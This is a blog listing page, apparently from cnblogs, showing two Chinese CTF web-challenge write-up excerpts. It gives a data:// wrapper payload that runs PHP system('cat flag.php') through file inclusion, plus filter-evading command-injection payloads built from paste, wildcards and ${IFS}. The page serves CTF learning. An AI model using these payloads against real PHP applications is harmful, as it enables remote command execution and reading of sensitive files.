摘要:
利用data://text/plain, payload:?file=data://text/plain,<?php system("cat flag.php");?> 阅读全文
posted @ 2021-02-03 15:48
z1ten9
阅读(207)
评论(0)
推荐(0)
摘要:
方法一:利用paste查看文件内容 payload:?c=paste$fla?.php 方法二: payload:/bin/?at${IFS}f??????? 可以理解为当前目录运行cat命令实际上运行的也是bin/cat,而通配符不会帮你去找到bin下面的cat 只会在当前目录寻找能通配的文件,所 阅读全文
posted @ 2021-02-03 11:07
z1ten9
阅读(269)
评论(0)
推荐(0)